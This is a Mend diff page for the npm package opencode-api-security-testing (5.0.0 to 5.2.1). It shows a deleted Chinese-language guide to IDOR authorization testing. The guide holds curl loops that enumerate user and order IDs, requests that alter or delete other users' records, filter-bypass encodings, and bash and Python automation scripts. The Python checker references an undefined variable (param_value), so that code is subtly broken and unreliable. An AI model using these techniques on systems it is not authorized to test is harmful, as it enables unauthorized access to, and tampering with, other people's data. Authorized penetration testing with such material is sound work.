npm - opencode-api-security-testing - Versions diffs - 5.0.0 → 5.2.1 - Mend

opencode-api-security-testing 5.0.0 → 5.2.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (28) hide show

package/package.json +48 -48
package/postinstall.mjs +40 -69
package/references/references/README.md +0 -72
package/references/references/asset-discovery.md +0 -119
package/references/references/fuzzing-patterns.md +0 -129
package/references/references/graphql-guidance.md +0 -108
package/references/references/intake.md +0 -84
package/references/references/pua-agent.md +0 -192
package/references/references/report-template.md +0 -156
package/references/references/rest-guidance.md +0 -76
package/references/references/severity-model.md +0 -76
package/references/references/test-matrix.md +0 -86
package/references/references/validation.md +0 -78
package/references/references/vulnerabilities/01-sqli-tests.md +0 -1128
package/references/references/vulnerabilities/02-user-enum-tests.md +0 -423
package/references/references/vulnerabilities/03-jwt-tests.md +0 -499
package/references/references/vulnerabilities/04-idor-tests.md +0 -362
package/references/references/vulnerabilities/05-sensitive-data-tests.md +0 -466
package/references/references/vulnerabilities/06-biz-logic-tests.md +0 -501
package/references/references/vulnerabilities/07-security-config-tests.md +0 -511
package/references/references/vulnerabilities/08-brute-force-tests.md +0 -457
package/references/references/vulnerabilities/09-vulnerability-chains.md +0 -465
package/references/references/vulnerabilities/10-auth-tests.md +0 -537
package/references/references/vulnerabilities/11-graphql-tests.md +0 -355
package/references/references/vulnerabilities/12-ssrf-tests.md +0 -396
package/references/references/vulnerabilities/README.md +0 -148
package/references/references/workflows.md +0 -192
package/src/src/index.ts +0 -535

package/references/references/vulnerabilities/04-idor-tests.md DELETED Viewed

@@ -1,362 +0,0 @@
-# IDOR 越权测试
-## 1. 概述
-IDOR（Insecure Direct Object Reference，不安全的直接对象引用）是指通过修改请求中的参数值来访问未经授权的他人资源。
-**危险等级**: 高
-## 2. 测试点识别
-### 2.1 常见越权参数
-| 参数名 | 示例 |
-|--------|------|
-| id | `?id=123` |
-| userId | `?userId=456` |
-| orderId | `?orderId=789` |
-| documentId | `?documentId=100` |
-| fileId | `?fileId=200` |
-### 2.2 常见越权接口
-| 接口类型 | 示例 |
-|----------|------|
-| 查看他人资料 | `GET /api/user/info?userId=X` |
-| 查看他人订单 | `GET /api/order/list?userId=X` |
-| 查看他人消息 | `GET /api/message/list?receiverId=X` |
-| 修改他人资料 | `POST /api/user/update` |
-| 删除他人资源 | `DELETE /api/resource?id=X` |
-## 3. 测试方法
-### 3.1 水平越权测试
-```bash
-# 1. 用户A正常登录
-POST /api/login
-{"username": "userA", "password": "xxx"}
-# 返回: {"userId": "100", "name": "User A"}
-# 2. 用户A访问自己的数据
-GET /api/user/info?userId=100
-Headers: {"Authorization": "Bearer token_A"}
-# 响应: {"userId": 100, "name": "User A", ...}
-# 3. 用户A尝试访问用户B的数据
-GET /api/user/info?userId=101
-Headers: {"Authorization": "Bearer token_A"}
-# 返回用户B的数据 → 存在IDOR
-# 返回无权限/自己的数据 → 安全
-```
-### 3.2 批量遍历测试
-```bash
-# 批量测试 userId
-for i in {100..110}; do
-    curl -s "http://api/user/info?userId=$i" \
-        -H "Authorization: Bearer token_A"
-done
-# 批量测试 orderId
-for i in {1..10}; do
-    curl -s "http://api/order/detail?orderId=$i" \
-        -H "Authorization: Bearer token_A"
-done
-```
-### 3.3 POST 参数篡改
-```bash
-# 1. 正常修改自己的信息
-POST /api/user/update
-Headers: {"Authorization": "Bearer token_A"}
-{"userId": 100, "name": "User A Modified"}
-# 2. 修改他人的信息
-POST /api/user/update
-Headers: {"Authorization": "Bearer token_A"}
-{"userId": 101, "name": "User B Modified"}
-# 成功修改 → 存在IDOR
-```
-### 3.4 JWT/Token 篡改
-```bash
-# 1. 获取用户A的Token
-POST /api/login
-{"username": "userA", "password": "xxx"}
-# 返回 Token A
-# 2. 在 Token 中修改 userId 或直接修改请求参数
-GET /api/user/info?userId=101
-Headers: {"Authorization": "Bearer token_A"}
-# 绕过验证访问用户B数据
-```
-## 4. 测试场景
-### 4.1 资源查看
-```bash
-# 订单
-GET /api/order/{orderId}
-# 发票
-GET /api/invoice/{invoiceId}
-# 文件
-GET /api/file/{fileId}
-# 消息
-GET /api/message/{messageId}
-```
-### 4.2 资源修改
-```bash
-# 修改订单
-POST /api/order/{orderId}
-{"status": "cancelled"}
-# 修改收货地址
-POST /api/address/{addressId}
-{"address": "hacker_address"}
-# 修改手机号
-POST /api/user/phone
-{"phone": "13900000000"}
-```
-### 4.3 资源删除
-```bash
-DELETE /api/order/{orderId}
-DELETE /api/file/{fileId}
-DELETE /api/user/{userId}
-```
-## 5. 防护绕过
-### 5.1 参数变形
-```bash
-# 尝试不同的参数名
-?userId=100
-?user_id=100
-?user-id=100
-?uid=100
-?id=100
-```
-### 5.2 编码绕过
-```bash
-# Base64 编码
-?id=MTAw (Base64 of 100)
-# 十六进制
-?id=0x64
-# 双重 URL 编码
-?id=%31%30%30
-```
-### 5.3 类型转换
-```bash
-# 字符串转数字
-?id[]=100
-?id=100.0
-?id="100"
-```
-## 6. 关联漏洞
-| 后续漏洞 | 利用路径 |
-|----------|----------|
-| 敏感信息泄露 | 遍历获取大量用户数据 |
-| 垂直越权 | 篡改 role 参数提升权限 |
-| 金融欺诈 | 修改他人订单、支付信息 |
-## 7. 测试检查清单
-```
-□ 识别所有带 ID 参数的接口
-□ 测试水平越权（访问他人同级别资源）
-□ 测试垂直越权（访问更高级别资源）
-□ 批量遍历测试（for循环）
-□ 测试 POST 参数篡改
-□ 测试 Token 篡改
-□ 测试防护绕过（参数变形、编码）
-□ 评估数据泄露范围
-□ 检查是否有频率限制
-```
-## 8. IDOR 自动化测试脚本
-### 8.1 误报判断标准
-**【核心】判断IDOR必须有明确的差异证明**
-```
-判断逻辑：
-1. 用自己账号获取自己数据 → 记录响应结构
-2. 用自己账号尝试获取他人数据 → 检查响应差异
-3. 差异必须是"他人数据"而不是"自己的另一个数据"
-【真实IDOR特征】
-- 返回了userId=X的数据，但请求用的是userId=Y的token
-- 水平越权：返回了同级用户的数据
-- 垂直越权：低权限用户获取了高权限数据
-【误报特征】
-- 公开接口本来就返回这些数据
-- 返回的是"空数据"或"无权访问"提示
-- 只是ID格式不同，实际获取的还是自己的数据
-```
-### 8.2 curl + 对比验证流程
-```bash
-# 1. 获取用户A的正常数据（基准）
-curl -s -H "Authorization: Bearer token_A" \
-  "http://api/user/info?userId=100" > idor_baseline.json
-# 2. 尝试用用户A的token访问用户B的数据
-curl -s -H "Authorization: Bearer token_A" \
-  "http://api/user/info?userId=101" > idor_test.json
-# 3. 对比两次响应
-diff idor_baseline.json idor_test.json
-# 4. 判断标准
-# - 如果两次响应完全相同 → 可能不是IDOR（或者两人数据相同）
-# - 如果userId从100变成101且数据也变了 → 确认IDOR
-# - 如果返回"无权访问"→ 安全
-```
-### 8.3 多参数遍历测试
-```bash
-#!/bin/bash
-# IDOR多参数批量测试
-TOKEN="user_token"
-BASE_URL="http://api"
-# 常见越权参数
-PARAMS=("userId" "id" "orderId" "documentId" "fileId" "accountId")
-for param in "${PARAMS[@]}"; do
-    echo "Testing $param..."
-    # 测试不同ID值
-    for i in {100..105}; do
-        RESPONSE=$(curl -s -H "Authorization: Bearer $TOKEN" \
-            "$BASE_URL/user/info?${param}=${i}")
-        # 检查是否返回了数据（而非错误提示）
-        if echo "$RESPONSE" | grep -q "userId"; then
-            # 提取返回的userId
-            RETURNED_ID=$(echo "$RESPONSE" | grep -o '"userId":[0-9]*' | head -1)
-            echo "  ${param}=${i} → $RETURNED_ID"
-            # 判断是否为IDOR（返回的userId与请求的不同）
-            if [[ "$RETURNED_ID" != *"100"* ]] && [[ "$RETURNED_ID" != *"101"* ]]; then
-                if [[ "$RETURNED_ID" == *"$i"* ]]; then
-                    echo "  [潜在IDOR] 请求${param}=${i}，返回了对应数据"
-                fi
-            fi
-        fi
-    done
-done
-```
-### 8.4 Python脚本（复杂场景）
-```python
-import requests
-import json
-import difflib
-base_url = "http://api"
-token = "user_token"
-def get_baseline():
-    """获取正常响应基准"""
-    resp = requests.get(
-        f"{base_url}/user/info",
-        params={"userId": 100},
-        headers={"Authorization": f"Bearer {token}"}
-    )
-    return resp.json()
-def test_idor(param_name, param_value):
-    """测试单个IDOR"""
-    resp = requests.get(
-        f"{base_url}/user/info",
-        params={param_name: param_value},
-        headers={"Authorization": f"Bearer {token}"}
-    )
-    return resp
-def is_idor(baseline, response):
-    """
-    判断是否为真实IDOR
-    【判断标准】
-    1. 响应状态码必须是200
-    2. 响应必须包含数据（不能是错误提示）
-    3. 返回的数据必须与请求的ID对应
-    4. 不能是"无权访问"或"用户不存在"
-    """
-    if response.status_code != 200:
-        return False, "状态码不是200"
-    try:
-        data = response.json()
-    except:
-        return False, "响应不是JSON"
-    # 检查是否返回了数据（而非错误）
-    if not data or len(data) == 0:
-        return False, "返回空数据"
-    # 检查是否有错误提示
-    error_keywords = ["无权限", "权限不足", "不存在", "error", "failed"]
-    data_str = json.dumps(data).lower()
-    for kw in error_keywords:
-        if kw in data_str:
-            return False, f"包含错误提示: {kw}"
-    # 【核心判断】baseline和test返回的数据是否有实际差异
-    baseline_str = json.dumps(baseline, sort_keys=True)
-    test_str = json.dumps(data, sort_keys=True)
-    if baseline_str == test_str:
-        return False, "响应与基准完全相同"
-    # 检查返回的ID是否与请求的ID匹配
-    if "userId" in data and data["userId"] != param_value:
-        return True, f"IDOR: 请求userId={param_value}, 返回userId={data['userId']}"
-    return False, "数据有差异但可能是正常业务"
-# 主测试流程
-baseline = get_baseline()
-print(f"基准数据: {json.dumps(baseline, indent=2)}")
-# 测试不同ID
-ids_to_test = [101, 102, 103, 104, 105]
-for test_id in ids_to_test:
-    response = test_idor("userId", test_id)
-    is_vuln, reason = is_idor(baseline, response)
-    if is_vuln:
-        print(f"[VULN] IDOR - userId={test_id}: {reason}")
-        print(f"  响应: {response.json()}")
-    else:
-        print(f"[SAFE] userId={test_id}: {reason}")
-```